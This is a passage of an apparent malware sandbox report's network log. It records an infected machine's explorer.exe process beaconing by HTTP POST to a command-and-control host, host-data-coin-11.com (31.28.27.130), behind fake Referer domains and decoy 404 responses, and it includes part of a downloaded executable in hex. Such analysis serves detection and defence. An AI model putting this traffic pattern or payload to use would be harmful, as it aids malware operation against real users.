00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 26 86 f4 5a db 45 07 0b a0 46 07 ed 57 50 76 eb 80 e8 0f e7 2b 84 d4 93 59 a4 35 74 61 a8 22 02 2c 0a 81 1f 8f 05 52 f9 2a 57 76 8b e6 81 eb c3 f5 d1 66 f7 03 6c 40 3d 00
                                                                                                                                                                                                          Data Ascii: MZog':(332fC'B{b+Rd:QPELa.P?@@@c@@=XP=.adata0=`.adata@=@.rsrcP=@@.textP?Q}@q&ZEFWPv+Y5ta",R*Wvfl@=


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          51192.168.2.34982531.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:30.657203913 CET15516OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://mkywnx.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 193
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:30.745934963 CET15517INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:30 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          52192.168.2.34982631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.100898981 CET15518OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://peohmenso.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 167
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.175664902 CET15519INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:31 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          53192.168.2.34982731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.281554937 CET15520OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://uqnmulbyla.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 201
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.362296104 CET15521INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:31 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          54192.168.2.34982831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.444654942 CET15522OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://fpvmtbyuw.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 288
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.535141945 CET15523INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:31 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          55192.168.2.34982931.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.630235910 CET15524OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://qsrlhvaju.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 189
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.701318026 CET15524INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:31 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 22I:82OO%-0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          56192.168.2.34983231.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.219500065 CET15543OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://hcvyqvy.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 350
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.297113895 CET15544INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:32 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 33 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 59 8c 3a f8 0e 69 c0 31 c3 db 66 f1 64 50 06 b9 bc 8e 16 a3 1b 80 02 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 37I:82OTeY:i1fdP0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          57192.168.2.34983431.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.139503002 CET16567OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://adfmjw.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 305
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.218784094 CET16567INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:33 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 4e 08 79 06 be aa 85 bc a1 5e b1 44 ca 7a a6 55 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 25I:82ONy^DzU0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          58192.168.2.34983731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:34.971601009 CET17175OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://ynpnhswfhp.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 367
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.046775103 CET17176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:35 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          59192.168.2.34983831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.141576052 CET17177OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://bdqusscd.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 110
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.219156981 CET17177INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:35 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          6192.168.2.34974431.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.592971087 CET1101OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://jkkeh.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 228
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.674894094 CET1101INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:40 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 19{i+,GO0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          7192.168.2.34974531.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.757766962 CET1102OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://paagmrxgm.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 110
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.838114023 CET1103INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:40 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
